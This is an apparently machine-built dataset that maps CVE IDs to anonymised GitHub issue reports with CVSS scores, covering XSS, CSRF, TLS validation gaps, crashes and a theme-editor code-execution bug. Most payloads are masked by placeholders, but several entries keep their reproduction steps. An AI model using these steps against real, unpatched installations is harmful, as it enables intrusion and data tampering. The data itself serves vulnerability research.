        "description": "Add n/w level security guideline to to restrict outbound connections of Publisher node.. Description: in a WSO2 API M deployment, we recommend restricting outbound connections of the Publisher node only to the required internal nodes (only to the nodes which Publisher portal is intended to communicate with) of the deployment. So even if privileged user credentials were exploited to a user with malicious intent, they cannot perform network scans using the existing functionlities against the other services exposed in the same private network of Publisher node.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-13230",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3343",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/3343",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2020-03-11T14:37:20Z",
        "description": "Improper Access Control on disabling a user.. Describe the bug Cacti admin console provides a functionality to disable a created user which takes his privileges to perform any action but if a page is auto refreshed a disabled user can view updated data. To Reproduce Steps to reproduce the behavior NUMBERTAG Log in with Admin account and navigate to URLTAG NUMBERTAG Give the new user permission to view logs NUMBERTAG Login to new user's account and navigate FILETAG NUMBERTAG From Admin's account disable the created user. Actual behavior A disabled user can view the system logs and the logs are even updating after the refresh time. Expected behavior A disabled user should not be privileged to view the system logs. OS: Ubuntu Browser: Firefox Version Cacti NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-13231",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3342",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/3342",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2020-03-11T13:32:33Z",
        "description": "CSRF at Admin Email. Describe the bug A malformed GET request at URLTAG can lead to admin email change. Affected URI URLTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to ' URLTAG NUMBERTAG Turn on a proxy interceptor, I used Burp NUMBERTAG Change the email and save the request NUMBERTAG Change the email in the saved request and send the URL to a logged in admin NUMBERTAG Admin email will be changed Malformed Request: FILETAG Expected behavior Such actions should not be requested with GET method and anti CSRF tokens should be used. OS: Ubuntu Browser: Firefox Version: Cacti Version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-13246",
        "Issue_Url_old": "https://github.com/go-gitea/gitea/issues/10549",
        "Issue_Url_new": "https://github.com/go-gitea/gitea/issues/10549",
        "Repo_new": "go-gitea/gitea",
        "Issue_Created_At": "2020-03-01T08:47:20Z",
        "description": "Server freezes when transferring the ownership. Gitea version (or commit ref NUMBERTAG Git version NUMBERTAG Operating system: Debian NUMBERTAG Database (use APITAG ): [ ] APITAG [ ] APITAG [ ] MSSQL [x] APITAG Can you reproduce the bug at FILETAG [ ] Yes (provide example URL) [x] No [ ] Not relevant Log gist: Description Today I encountered a strange bug. When I transfer a mirror repository, the server freezes until I manually restart it. I checked the console and log and I don't see any error or warning. When I re migrated the same repository from Github and try to transfer it, it succeeded. But the problem with the old repository persisted. Screenshots",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-13258",
        "Issue_Url_old": "https://github.com/contentful/the-example-app.py/issues/44",
        "Issue_Url_new": "https://github.com/contentful/the-example-app.py/issues/44",
        "Repo_new": "contentful/the-example-app.py",
        "Issue_Created_At": "2020-05-21T13:52:53Z",
        "description": "Reflected Xss. Hi Team I found a reflected xss vulnerability. Proof of concept: URLTAG \" APITAG APITAG alert NUMBERTAG APITAG &locale=en US",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-13429",
        "Issue_Url_old": "https://github.com/grafana/piechart-panel/issues/218",
        "Issue_Url_new": "https://github.com/grafana/piechart-panel/issues/218",
        "Repo_new": "grafana/piechart-panel",
        "Issue_Created_At": "2020-02-05T14:23:34Z",
        "description": "XSS flaw in piechart panel. The pie chart panel is potentially vulnerable to XSS scripting as it processes any javascript in the APITAG Header\" configuration option. e.g. APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-13438",
        "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/23",
        "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/23",
        "Repo_new": "rockcarry/ffjpeg",
        "Issue_Created_At": "2020-05-23T17:08:31Z",
        "description": "SEGV in function jfif_encode in APITAG Tested in Ubuntu NUMBERTAG bit. The testcase is segv_ffjpeg_e2 segv_ffjpeg_e2 . I use the following command: APITAG and get: Segmentation fault I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG The gdb reports: CODETAG An attacker can exploit this vulnerability by submitting a malicious bmp that exploits this bug which will result in a Denial of Service APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-13439",
        "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/24",
        "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/24",
        "Repo_new": "rockcarry/ffjpeg",
        "Issue_Created_At": "2020-05-23T17:09:21Z",
        "description": "heap buffer overflow in function jfif_decode at APITAG Tested in Ubuntu NUMBERTAG bit. The tesecase is heap buffer overflow_ffjpeg_d1 CVETAG . I use the following command: APITAG and get: Segmentation fault I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG The gdb reports (absolute path information omitted):: CODETAG An attacker can exploit this vulnerability by submitting a malicious bmp that exploits this bug which will result in a Denial of Service APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-13440",
        "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/22",
        "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/22",
        "Repo_new": "rockcarry/ffjpeg",
        "Issue_Created_At": "2020-05-23T17:07:53Z",
        "description": "SEGV in function bmp_load at APITAG Tested in Ubuntu NUMBERTAG bit. The testcase is segv_ffjpeg_e1 CVETAG . I use the following command: APITAG and get: Segmentation fault I use valgrind to analysis the bug and get the below information (absolute path information omitted): ERRORTAG I use APITAG to build ffjpeg and running it with the following command: APITAG This is the ASAN information (absolute path information omitted): ERRORTAG An attacker can exploit this vulnerability by submitting a malicious bmp that exploits this bug which will result in a Denial of Service APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-13449",
        "Issue_Url_old": "https://github.com/thecodingmachine/gotenberg/issues/199",
        "Issue_Url_new": "https://github.com/gotenberg/gotenberg/issues/199",
        "Repo_new": "gotenberg/gotenberg",
        "Issue_Created_At": "2020-05-25T07:00:23Z",
        "description": "Critical vulnerability. Hi there, I have identified several vulnerabilities in Gotenberg which all lead to arbitrary code execution in the container. Following responsible disclosure model I would like to give contributors more details so that you could fix this. MENTIONTAG : please provide some e mail and pgp key so that I can contact you securely. After fix I'm planning to make a disclosure on seclists. I have also requested CVE IDs for the issues. Best regards!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-13482",
        "Issue_Url_old": "https://github.com/igrigorik/em-http-request/issues/339",
        "Issue_Url_new": "https://github.com/igrigorik/em-http-request/issues/339",
        "Repo_new": "igrigorik/em-http-request",
        "Issue_Created_At": "2020-05-24T21:28:35Z",
        "description": "Security vulnerability: missing SSL hostname validation. APITAG Security Lab (GHSL) Vulnerability Report: APITAG Summary Missing hostname validation allows an attacker to perform a man in the middle attack against users of the library. Product em http request Tested Version NUMBERTAG Missing SSL/TLS certificate hostname validation em http request URLTAG uses the library eventmachine URLTAG in an insecure way that allows an attacker to perform a man in the middle attack against users of the library. Impact An attacker can assume the identity of a trusted server and introduce malicious data in an otherwise trusted place. Remediation Implement hostname validation. Resources To trigger the vulnerability, a simple TLS enabled listening daemon is sufficient as described in the following snippets. ERRORTAG Create a sample client with the following contents: ERRORTAG Run the example client to see a connection being performed in the listening daemon initialized in the previous steps. APITAG References FILETAG APITAG Security Advisories We recommend you create a private APITAG Security Advisory URLTAG for these findings. This also allows you to invite the GHSL team to collaborate and further discuss these findings in private before they are published URLTAG . Credit This issue was discovered and reported by GHSL team member MENTIONTAG APITAG Gianni) URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.4,
        "impactScore": 5.2,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-13597",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/91507",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/91507",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2020-05-27T19:32:29Z",
        "description": "Placeholder issue. Placeholder issue, please do not delete.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 3.5,
        "impactScore": 1.4,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-13614",
        "Issue_Url_old": "https://github.com/axel-download-accelerator/axel/issues/262",
        "Issue_Url_new": "https://github.com/axel-download-accelerator/axel/issues/262",
        "Repo_new": "axel-download-accelerator/axel",
        "Issue_Created_At": "2020-03-16T22:55:56Z",
        "description": "Axel may not verify server certificate PATHTAG (allowing SSL interception). It looks like Axel's SSL's connections do not verify server certificate hostnames. To fix this the SSL context should set a certificate callback or use APITAG to set the intended hostname. This is an issue since it uses APITAG and loads all root authorities from the OS. See URLTAG for a description of this nuance with the APITAG APIs. Here is potentially insecure code URLTAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-13615",
        "Issue_Url_old": "https://github.com/qorelanguage/qore/issues/3808",
        "Issue_Url_new": "https://github.com/qorelanguage/qore/issues/3808",
        "Repo_new": "qorelanguage/qore",
        "Issue_Created_At": "2020-03-04T06:46:33Z",
        "description": "Qore does not perform hostname validation during certification NUMBERTAG alidation. see: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-13622",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3787",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3787",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-05-23T17:53:33Z",
        "description": "Assertion 'ecma_is_value_string (value)' failed at PATHTAG APITAG APITAG revision URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-13623",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3785",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3785",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-05-23T08:58:58Z",
        "description": "Stack Exhaustion (ecma_proxy_object_get, ecma_proxy_object_set). APITAG revision URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test cases APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-13649",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3788",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3788",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-05-23T17:56:43Z",
        "description": "Assertion 'context_p >error == PARSER_ERR_NO_ERROR' failed at PATHTAG (scanner_scan_all NUMBERTAG APITAG revision URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-13649",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3786",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3786",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-05-23T17:46:47Z",
        "description": "NULL dereference in scanner_reverse_info_list. APITAG revision URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-13757",
        "Issue_Url_old": "https://github.com/sybrenstuvel/python-rsa/issues/146",
        "Issue_Url_new": "https://github.com/sybrenstuvel/python-rsa/issues/146",
        "Repo_new": "sybrenstuvel/python-rsa",
        "Issue_Created_At": "2020-05-27T08:11:51Z",
        "description": "python rsa does not detect ciphertext modification (prepended NUMBERTAG bytes) in PKCS NUMBERTAG Hello, Using this testcase from Google Wycheproof: ERRORTAG CODETAG I found that python rsa (I'm using python rsa NUMBERTAG does not detect if bytes NUMBERTAG have been prepended to the ciphertext using NUMBERTAG and NUMBERTAG bit keys and it decrypts the ciphertext without error. However, python rsa detects if bytes NUMBERTAG have been appended to the ciphertext and does not decrypt the ciphertext. You can see this behaviour with NUMBERTAG and NUMBERTAG bit keys and the testvectors from Google Wycheproof below NUMBERTAG bit test vector: ERRORTAG NUMBERTAG bit test vector: ERRORTAG NUMBERTAG bit test vector: ERRORTAG On the other hand, pcryptodome detects whenever bytes NUMBERTAG are prepended to the ciphertext: ERRORTAG Best regards, Antonio",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-13759",
        "Issue_Url_old": "https://github.com/rust-vmm/vm-memory/issues/93",
        "Issue_Url_new": "https://github.com/rust-vmm/vm-memory/issues/93",
        "Repo_new": "rust-vmm/vm-memory",
        "Issue_Created_At": "2020-05-28T06:48:20Z",
        "description": "APITAG issue when using virtio with rust vmm/vm memory. We have identified an issue in the rust vmm vm memory crate that leads to a denial of service APITAG issue if the crate is used in a VMM in conjunction with virtio. The issue affects both vm memory releases NUMBERTAG and NUMBERTAG In our environment, we reproduced this with musl builds on NUMBERTAG and with all aarch NUMBERTAG builds. Issue Description In vm memory, the functions read_obj and write_obj are not doing atomic accesses for all combinations of platform and libc implementations. These reads and writes translate to memcpy, which may be performing byte by byte copies. Using vm memory in the virtio implementation can cause undefined behavior, as descriptor indexes require NUMBERTAG byte atomic accesses. Impact The issue can affect any virtio/emulated device which expects atomic writes for base types longer than NUMBERTAG byte. Observed impact: When the network stack is under load, the driver will try to clear a used descriptor before the index of the descriptor is fully written by the device. When this issue is triggered, the virtio net device will be unable to transmit packets. This leads to VMs using rust vmm/vm memory having their network effectively disconnected by outside network traffic, resulting in both a APITAG vector and an availability issue under normal at load operations. Affected Systems For a VMM to be affected, it must run on aarch NUMBERTAG built with either musl or glibc), or on NUMBERTAG with a musl build. All VMMs using rust vmm/vm memory (any release) in a production scenario, and that take arbitrary traffic over the virtio net device, are confirmed to be at risk of a DOS. All VMMs using rust vmm/vm memory (any release) in a production scenario with a virtio net deice are under availability risk. All VMMs using rust vmm/vm memory (any release) in a production scenario using other devices that expect atomic reads for more than NUMBERTAG byte values may also be affected, but we are unaware of any risk for other devices (beyond the guest freezing its own virtio stack).",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-13776",
        "Issue_Url_old": "https://github.com/systemd/systemd/issues/15985",
        "Issue_Url_new": "https://github.com/systemd/systemd/issues/15985",
        "Repo_new": "systemd/systemd",
        "Issue_Created_At": "2020-05-31T09:13:53Z",
        "description": "User names beginning with NUMBERTAG being interpreted as user identifiers. Version the issue has been seen with > APITAG APITAG and master APITAG APITAG APITAG Used distribution > Ubuntu NUMBERTAG LTS Expected behaviour you didn't see > APITAG > > ERRORTAG Unexpected behaviour you saw > APITAG > > APITAG Steps to reproduce the problem NUMBERTAG Create a user whose name starts with APITAG or APITAG (_exempli gratia:_ APITAG NUMBERTAG Log in with that user name and run APITAG NUMBERTAG Check the unexpected behavior above. Related issues > Symptoms are similar to NUMBERTAG Affected code URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.7,
        "impactScore": 5.9,
        "exploitabilityScore": 0.8
    },
    {
        "CVE_ID": "CVE-2020-13790",
        "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/433",
        "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/433",
        "Repo_new": "libjpeg-turbo/libjpeg-turbo",
        "Issue_Created_At": "2020-05-25T18:37:38Z",
        "description": "Heap based buffer over read in APITAG in rdppm.c. Have you searched the existing issues (both open and closed) in the libjpeg turbo issue tracker to ensure that this bug report is not a duplicate? Yes Does this bug report describe one of the FILETAG ? No Clear and concise description of the bug: Heap based buffer over read in APITAG in rdppm.c Steps to reproduce the bug (using only libjpeg turbo): Compile with Address Sanitizer APITAG : ./cjpeg ./reproducer Without APITAG valgrind q ./cjpeg ./reproducer Image(s) needed in order to reproduce the bug (if applicable): FILETAG Expected behavior: Observed behavior: ERRORTAG Platform(s) (compiler version, operating system version, CPU) on which the bug was observed: gcc APITAG NUMBERTAG ubuntu NUMBERTAG Linu NUMBERTAG generic libjpeg turbo release(s), commit(s), or branch(es) in which the bug was observed (always test the tip of the master branch or the latest stable pre release URLTAG to verify that the bug hasn't already been fixed): libjpeg turbo version NUMBERTAG master) If the bug is a regression, the specific commit that introduced the regression (use git bisect to determine this): Additional information:",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-13822",
        "Issue_Url_old": "https://github.com/indutny/elliptic/issues/226",
        "Issue_Url_new": "https://github.com/indutny/elliptic/issues/226",
        "Repo_new": "indutny/elliptic",
        "Issue_Created_At": "2020-06-01T09:49:31Z",
        "description": "Lack of encoding checks allows a certain degree of signature malleability in ECDSA signatures . Hello, Using elliptic NUMBERTAG I've found that the ECDSA verification functionality validates signatures as 'true' when the encoding is incorrect i.e. it has been modified / altered against the standard, allowing a certain degree of malleability in the signatures. Based on the Google Wycheproof test vectors, the following changes on an ECDSA signature are not detected: \"long form encoding of length of sequence\", \"length of sequence contains leading NUMBERTAG length of integer contains leading NUMBERTAG uint NUMBERTAG overflow in length of integer\", \"uint NUMBERTAG overflow in length of integer\", \"prepending NUMBERTAG s to integer\", \"long form encoding of length of integer\" See the proof of concept and test vectors below: ERRORTAG Test vectors: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L",
        "severity": "HIGH",
        "baseScore": 7.7,
        "impactScore": 5.5,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-13848",
        "Issue_Url_old": "https://github.com/pupnp/pupnp/issues/177",
        "Issue_Url_new": "https://github.com/pupnp/pupnp/issues/177",
        "Repo_new": "pupnp/pupnp",
        "Issue_Created_At": "2020-06-02T08:54:59Z",
        "description": "NULL pointer dereference in APITAG There is a NULL pointer dereference in the function APITAG in PATHTAG A segmentation fault occurs if the string APITAG is NULL. This crash can be triggered by sending a malformed SUBSCRIBE or UNSUBSCRIBE using any of the attached files. ERRORTAG This will result in the following output using subscribe ERRORTAG and using unsubscribe ERRORTAG This was tested on the current master branch and on release NUMBERTAG Earlier versions may also be affected. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-13881",
        "Issue_Url_old": "https://github.com/kravietz/pam_tacplus/issues/149",
        "Issue_Url_new": "https://github.com/kravietz/pam_tacplus/issues/149",
        "Repo_new": "kravietz/pam_tacplus",
        "Issue_Created_At": "2020-06-02T16:40:38Z",
        "description": "Printing server secret key in plain text in journalctl. In the example, we can see that server secret key is printed in plain text in journalctl logs. If an attacker is using man in the middle attack and somehow gets these logs, he/she can decrypt and see all packets. User passwords will also be exposed by that.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-13889",
        "Issue_Url_old": "https://github.com/bludit/bludit/issues/1205",
        "Issue_Url_new": "https://github.com/bludit/bludit/issues/1205",
        "Repo_new": "bludit/bludit",
        "Issue_Created_At": "2020-06-05T01:31:12Z",
        "description": "Possible XSS and HTML injection on admin page.. Hello I think I found a vulnerability. This vulnerability consists in a function called APITAG in the administration panel of bludit,that when accessed in DOM, allows users define the text to be popped up in the message box. But this function dont have any sanatization and the user can inject any javascript and html code in the page the payload used was: APITAG APITAG \"); FILETAG The versions that i tested was the Bludit NUMBERTAG I'll check the old ones for a more in deep report Thank you.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-13895",
        "Issue_Url_old": "https://github.com/FGasper/p5-Crypt-Perl/issues/14",
        "Issue_Url_new": "https://github.com/fgasper/p5-crypt-perl/issues/14",
        "Repo_new": "fgasper/p5-crypt-perl",
        "Issue_Created_At": "2020-06-04T10:07:35Z",
        "description": "APITAG fails to verify ECDSA signatures when r and s are small and when s NUMBERTAG Hello, I'm using APITAG NUMBERTAG ERRORTAG When using the following test vectors with small r, s and s NUMBERTAG from Google Wycheproof: ERRORTAG with the prime NUMBERTAG curve, I'm getting this output: ERRORTAG which can be verified with this proof of concept: ERRORTAG Best regards, Antonio",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-13962",
        "Issue_Url_old": "https://github.com/mumble-voip/mumble/issues/3679",
        "Issue_Url_new": "https://github.com/mumble-voip/mumble/issues/3679",
        "Repo_new": "mumble-voip/mumble",
        "Issue_Created_At": "2019-04-29T14:36:34Z",
        "description": "Connection drops with Qt NUMBERTAG SSL_shutdown:shutdown while in init). Since upgrading to Qt NUMBERTAG all clients get a disconnect after about NUMBERTAG minutes of connection time. Reproducible with Qt NUMBERTAG und Qt NUMBERTAG downgrading to NUMBERTAG solves this issue. Not sure if this is a Qt bug or not, so I'm reporting it here first, alto it looks like a bug in Qt. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-13978",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/464",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/464",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2020-05-22T18:06:25Z",
        "description": "Remote Code Execution via Theme module. Describe the bug An attacker could insert any executable code through php via Theme Module to execution command in the server To Reproduce Log into the panel. Go to PATHTAG Click edit Insert payload APITAG Go to index view FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-13980",
        "Issue_Url_old": "https://github.com/opencart/opencart/issues/7974",
        "Issue_Url_new": "https://github.com/opencart/opencart/issues/7974",
        "Repo_new": "opencart/opencart",
        "Issue_Created_At": "2020-05-31T16:35:45Z",
        "description": "Store XSS Vulnerability in Opencart NUMBERTAG Upload Images. Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the Upload Images To Reproduce Steps to reproduce the behavior NUMBERTAG Go to Profile NUMBERTAG Change name of images in local computer to \"> APITAG .png NUMBERTAG Click upload a images NUMBERTAG Click Upload image with payload in name to server NUMBERTAG See result popup XSS Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots / Screen recordings Link video POC: URLTAG Server / Test environment (please complete the following information): OS: Linux Browser: All Version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-13991",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3860",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3860",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2020-06-05T03:46:21Z",
        "description": "SIGABRT in jerry_port_fatal . APITAG revision APITAG Build platform Ubuntu NUMBERTAG LTS Build steps python tools/build.py profile=es NUMBERTAG subset lto=off error messages=on strip=off compile flag= fsanitize=address Test case function APITAG { const NUMBERTAG APITAG const NUMBERTAG const NUMBERTAG species\"]; const NUMBERTAG APITAG const NUMBERTAG constructor NUMBERTAG let NUMBERTAG const NUMBERTAG const NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG APITAG let NUMBERTAG while NUMBERTAG const NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG APITAG const NUMBERTAG APITAG const NUMBERTAG const NUMBERTAG species\"]; const NUMBERTAG APITAG const NUMBERTAG constructor NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG get:gc,set:gc}; const NUMBERTAG APITAG const NUMBERTAG const NUMBERTAG species\"]; const NUMBERTAG species\"]; const NUMBERTAG constructor NUMBERTAG const NUMBERTAG const NUMBERTAG APITAG let NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG const NUMBERTAG const NUMBERTAG species\"]; const NUMBERTAG APITAG const NUMBERTAG constructor NUMBERTAG const NUMBERTAG let NUMBERTAG const NUMBERTAG const NUMBERTAG APITAG const NUMBERTAG const NUMBERTAG const NUMBERTAG let NUMBERTAG do { let NUMBERTAG try { const NUMBERTAG APITAG } catch NUMBERTAG const NUMBERTAG typeof NUMBERTAG const NUMBERTAG number\"; let NUMBERTAG while NUMBERTAG APITAG Execution steps 